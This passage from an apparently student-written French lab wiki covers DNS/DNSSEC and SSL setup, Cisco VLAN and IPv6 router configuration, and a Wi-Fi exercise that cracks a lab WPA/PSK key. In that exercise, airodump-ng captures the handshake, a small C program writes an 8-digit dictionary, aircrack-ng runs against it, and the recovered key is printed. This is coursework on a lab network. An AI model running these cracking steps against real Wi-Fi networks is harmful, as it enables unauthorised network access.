        dnssec-validation auto;&lt;br /&gt;
  &lt;br /&gt;
        auth-nxdomain no;&lt;br /&gt;
        listen-on-v6 { any; };&lt;br /&gt;
        allow-recursion{localhost;};&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
named.conf.local&lt;br /&gt;
&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous créons le fichier /etc/bind/db.dionysos.space&lt;br /&gt;
  cp db.local db.dionysos.space &lt;br /&gt;
&lt;br /&gt;
Dans ce fichier nous entrons les paramètres suivants&lt;br /&gt;
&lt;br /&gt;
  ;&lt;br /&gt;
  ; BIND data file for local loopback interface&lt;br /&gt;
  ;&lt;br /&gt;
  $TTL    604800&lt;br /&gt;
  $include /root/SSL_certif/dionysos-ksk.key&lt;br /&gt;
  $include /root/SSL_certif/dionysos-zsk.key&lt;br /&gt;
  &lt;br /&gt;
  @       IN      SOA     ns.dionysos.space. root.dionysos.space (&lt;br /&gt;
                                2         ; Serial&lt;br /&gt;
                           604800         ; Refresh&lt;br /&gt;
                            86400         ; Retry&lt;br /&gt;
                          2419200         ; Expire&lt;br /&gt;
                           604800 )       ; Negative Cache TTL&lt;br /&gt;
  ;&lt;br /&gt;
          IN      NS      ns.dionysos.space. ;dns principal&lt;br /&gt;
          IN      NS      ns6.gandi.net.     ;dns secondaire&lt;br /&gt;
  @       IN      A       193.48.57.178      ;acces sans le &amp;quot;www.&amp;quot;&lt;br /&gt;
  ns      IN      NS      193.48.57.178      ;acces avec http https&lt;br /&gt;
  www     IN      A       193.48.57.178;     ;acces avec le &amp;quot;www.&lt;br /&gt;
&lt;br /&gt;
====Certificat SSL====&lt;br /&gt;
  &lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
  openssl req -nodes -newkey rsa:2048 -sha1 -keyout dionysos.space.key -out dionysos.space.csr&lt;br /&gt;
  ...&lt;br /&gt;
  Common Name (e.g. server FQDN or YOUR name) []:dionysos.space et dionysos.space.key&lt;br /&gt;
  Email Address []:qboens@polytech-lille.net&lt;br /&gt;
&lt;br /&gt;
Cette opération génére deux fichiers : dionysos.space.crt et dionysos.space.key&lt;br /&gt;
&lt;br /&gt;
Une fois cette étape faite on récupére sur gandi GandiStandardSSLCA2.pem, dans l'onglet du certificat.&lt;br /&gt;
&lt;br /&gt;
Tous les fichiers sont placés dans le répertoire SSL_certif&lt;br /&gt;
  mv dionysos.space.csr SSL_certif&lt;br /&gt;
  mv dionysos.space.key SSL_certif&lt;br /&gt;
  mv GandiStandardSSLCA2.pem SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Installation de DNSSEC====&lt;br /&gt;
&lt;br /&gt;
Création de la clef KSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
Création de la clef ZSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ces clefs ont été crées dans le dossier SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création d'un fichier signé à partir de db.dionysos.space&lt;br /&gt;
  dnssec-signzone -o dionysos.space -k dionysos-ksk.key /etc/bind/db.dionysos.space dionysos-zsk.key &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans named.conf.local nous changons le fichier cible, pour que bind9 prenne en compte db.dionysos.space.signed, qui est le fichier signé&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space.signed&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
Puis nous relançons bind9&lt;br /&gt;
  service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Sur le site gandi nous ajoutons les deux clefs, dans l'onglet DNSSEC&lt;br /&gt;
&lt;br /&gt;
Un bon moyen de contrôler le déploiement de nos clefs : [http://dnsviz.net/]&lt;br /&gt;
&lt;br /&gt;
===Séance 3.5 : 14/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Craquage WPA/PSK par dictionnaire====&lt;br /&gt;
&lt;br /&gt;
Materiel utilisé :&lt;br /&gt;
&lt;br /&gt;
* un PC portable&lt;br /&gt;
* une clé Wi-Pi (nécessaire pour le PC portable que nous avons utilisé pour la partie handshake)&lt;br /&gt;
* Zabeth13 pour le craquage&lt;br /&gt;
&lt;br /&gt;
=====Récupération du handshake=====&lt;br /&gt;
&lt;br /&gt;
Premièrement sur le PC portable SOLE, &lt;br /&gt;
&lt;br /&gt;
 #ip a&lt;br /&gt;
&lt;br /&gt;
pour vérifier que nous disposons bien d'une interface wifi &amp;lt;code&amp;gt;wlx40a5ef0f68ce&amp;lt;/code&amp;gt;, puis nous l'utilisons pour écouter sur le wifi :&lt;br /&gt;
&lt;br /&gt;
 #airmon-ng start &amp;lt;nom_de_l'interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère l'interface retournée, dans notre cas &amp;lt;code&amp;gt;wlan0mon&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On note l'ESSID de cracotte02 et son channel pour ensuite renvoyer dans des fichiers&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng --bssid &amp;lt;ESSID cracotte02&amp;gt; wlan0mon --channel 9 --write FILENAME&lt;br /&gt;
&lt;br /&gt;
On dispose ensuite de 4 fichiers FILENAME.cap FILENAME.csv FILENAME.kismet.csv FILENAME.kismet.netxml&lt;br /&gt;
&lt;br /&gt;
On peut à présent transférer ces fichiers sur ZABETH13 via clé usb:&lt;br /&gt;
&lt;br /&gt;
=====Rappel montage USB=====&lt;br /&gt;
&lt;br /&gt;
 #fdisk -l                                                 //avant de brancher la clé USB&lt;br /&gt;
 #fdisk -l                                                 //on récupère l'emplacement de la clé (ex: /dev/sdb -&amp;gt; /dev/sdb1)&lt;br /&gt;
 #mkdir /media/MA_CLE_USB&lt;br /&gt;
 #mount /dev/sdb1 /media/MA_CLE_USB&lt;br /&gt;
 #mv /home/pifou/Mon_FICHIER /media/MA_CLE_USB             //répéter autant que nécessaire&lt;br /&gt;
 #umount /media/MA_CLE_USB&lt;br /&gt;
&lt;br /&gt;
=====Crack WPA/PSK=====&lt;br /&gt;
&lt;br /&gt;
On crée un petit programme &amp;lt;code&amp;gt;main.c&amp;lt;/code&amp;gt; pour lister tous les codes possibles, on sait qu'il s'agit d'un code de 8 chiffres&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     int i;&lt;br /&gt;
     // key is 8 numeric digits&lt;br /&gt;
     for(i=0;i&amp;lt;99999999;i++){&lt;br /&gt;
         printf(&amp;quot;%d\n&amp;quot;,i);&lt;br /&gt;
     }&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
On compile et on stock dans un txt&lt;br /&gt;
&lt;br /&gt;
 #gcc main.c -o main -Wall&lt;br /&gt;
 #./main &amp;gt; dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
On peut à présent lancer le crack&lt;br /&gt;
&lt;br /&gt;
 #aircrack-ng FILENAME.cap -w dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:crack-cracotte02.png]]&lt;br /&gt;
&lt;br /&gt;
Après un certains temps d'execution, on obtient la clé&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Found_key.png]]&lt;br /&gt;
&lt;br /&gt;
Clé : 42429902&lt;br /&gt;
===Séance 4 : 17/12/2018===&lt;br /&gt;
====Correction IPV6 routeur====&lt;br /&gt;
&lt;br /&gt;
===== Vlan 43 - XEN =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 131 - Interconnexion =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 10+N - Groupe N =====&lt;br /&gt;
&lt;br /&gt;
'''IPv4'''&lt;br /&gt;
&lt;br /&gt;
* Notre Routeur : &amp;lt;code&amp;gt;10.60.10+N.252&amp;lt;/code&amp;gt;&lt;br /&gt;
* Routeur Virtuel : &amp;lt;code&amp;gt;10.60.10+N.254&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''IPv6'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;2001:660:4401:60XX&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* VLAN 11 à 21 : &amp;lt;code&amp;gt;C1&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;CB&amp;lt;/code&amp;gt;&lt;br /&gt;
* VLAN 43 : &amp;lt;code&amp;gt;C0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Groupe 1&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan11&lt;br /&gt;
 int vlan11&lt;br /&gt;
 ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 11 ip 10.60.11.254&lt;br /&gt;
 standby 11 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 11&lt;br /&gt;
 name groupe1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 2&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan12&lt;br /&gt;
 int vlan12&lt;br /&gt;
 ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 12 ip 10.60.12.254&lt;br /&gt;
 standby 12 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 12&lt;br /&gt;
 name groupe2&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 3&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan13&lt;br /&gt;
 int vlan13&lt;br /&gt;
 ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 13 ip 10.60.13.254&lt;br /&gt;
 standby 13 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 13&lt;br /&gt;
 name groupe3&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 4&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan14&lt;br /&gt;
 int vlan14&lt;br /&gt;
 ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 14 ip 10.60.14.254&lt;br /&gt;
 standby 14 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 14&lt;br /&gt;
 name groupe4&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 5&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan15&lt;br /&gt;
 int vlan15&lt;br /&gt;
 ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 15 ip 10.60.15.254&lt;br /&gt;
 standby 15 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 15&lt;br /&gt;
 name groupe5&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 6&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan16&lt;br /&gt;
 int vlan16&lt;br /&gt;
 ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 16 ip 10.60.16.254&lt;br /&gt;
 standby 16 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 16&lt;br /&gt;
 name groupe6&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 7&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan17&lt;br /&gt;
 int vlan17&lt;br /&gt;
 ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 17 ip 10.60.17.254&lt;br /&gt;
 standby 17 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 17&lt;br /&gt;
 name groupe7&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 8&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan18&lt;br /&gt;
 int vlan18&lt;br /&gt;
 ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 18 ip 10.60.18.254&lt;br /&gt;
 standby 18 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 18&lt;br /&gt;
 name groupe8&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 9&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan19&lt;br /&gt;
 int vlan19&lt;br /&gt;
 ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 19 ip 10.60.19.254&lt;br /&gt;
 standby 19 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 19&lt;br /&gt;
 name groupe9&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 10&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan20&lt;br /&gt;
 int vlan20&lt;br /&gt;
 ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 20 ip 10.60.20.254&lt;br /&gt;
 standby 20 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 20&lt;br /&gt;
 name groupe10&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 11&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan21&lt;br /&gt;
 int vlan21&lt;br /&gt;
 ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 21 ip 10.60.21.254&lt;br /&gt;
 standby 21 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 21&lt;br /&gt;
 name groupe11&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vérifications du fonctionnement =====&lt;br /&gt;
&lt;br /&gt;
====== show running-config ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show run &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 spanning-tree mode pvst&lt;br /&gt;
 spanning-tree loopguard default&lt;br /&gt;
 spanning-tree etherchannel guard misconfig&lt;br /&gt;
 spanning-tree extend system-id&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/3&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/4&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/5&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/6&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/7&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !         &lt;br /&gt;
 interface GigabitEthernet0/8&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/9&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/10&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/11&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface TenGigabitEthernet0/1&lt;br /&gt;
  switchport access vlan 131&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface TenGigabitEthernet0/2&lt;br /&gt;
  switchport access vlan 43&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan11&lt;br /&gt;
  ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 11 ip 10.60.11.254&lt;br /&gt;
  standby 11 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan12&lt;br /&gt;
  ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 12 ip 10.60.12.254&lt;br /&gt;
  standby 12 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan13&lt;br /&gt;
  ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 13 ip 10.60.13.254&lt;br /&gt;
  standby 13 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan14&lt;br /&gt;
  ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 14 ip 10.60.14.254&lt;br /&gt;
  standby 14 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan15&lt;br /&gt;
  ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 15 ip 10.60.15.254&lt;br /&gt;
  standby 15 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan16&lt;br /&gt;
  ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 16 ip 10.60.16.254&lt;br /&gt;
  standby 16 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan17&lt;br /&gt;
  ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 17 ip 10.60.17.254&lt;br /&gt;
  standby 17 preempt&lt;br /&gt;
 !         &lt;br /&gt;
 interface Vlan18&lt;br /&gt;
  ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 18 ip 10.60.18.254&lt;br /&gt;
  standby 18 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan19&lt;br /&gt;
  ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 19 ip 10.60.19.254&lt;br /&gt;
  standby 19 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan20&lt;br /&gt;
  ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 20 ip 10.60.20.254&lt;br /&gt;
  standby 20 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan21&lt;br /&gt;
  ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 21 ip 10.60.21.254&lt;br /&gt;
  standby 21 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan43&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 22 ip 193.48.57.190&lt;br /&gt;
  standby 22 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan131&lt;br /&gt;
  ip address 192.168.222.9 255.255.255.248&lt;br /&gt;
  ipv6 address FE80::2 link-local&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 rip tpima2a5 enable&lt;br /&gt;
 !&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  router-id 10.60.11.252&lt;br /&gt;
  log-adjacency-changes&lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
  summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise&lt;br /&gt;
  redistribute connected subnets&lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 router rip tpima5sc&lt;br /&gt;
  redistribute connected metric 1&lt;br /&gt;
  redistribute static metric 1&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 end&lt;br /&gt;
&lt;br /&gt;
====== Show Interface status ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show int status &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Port      Name               Status       Vlan       Duplex  Speed Type&lt;br /&gt;
 Gi0/1                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/2                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/3                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
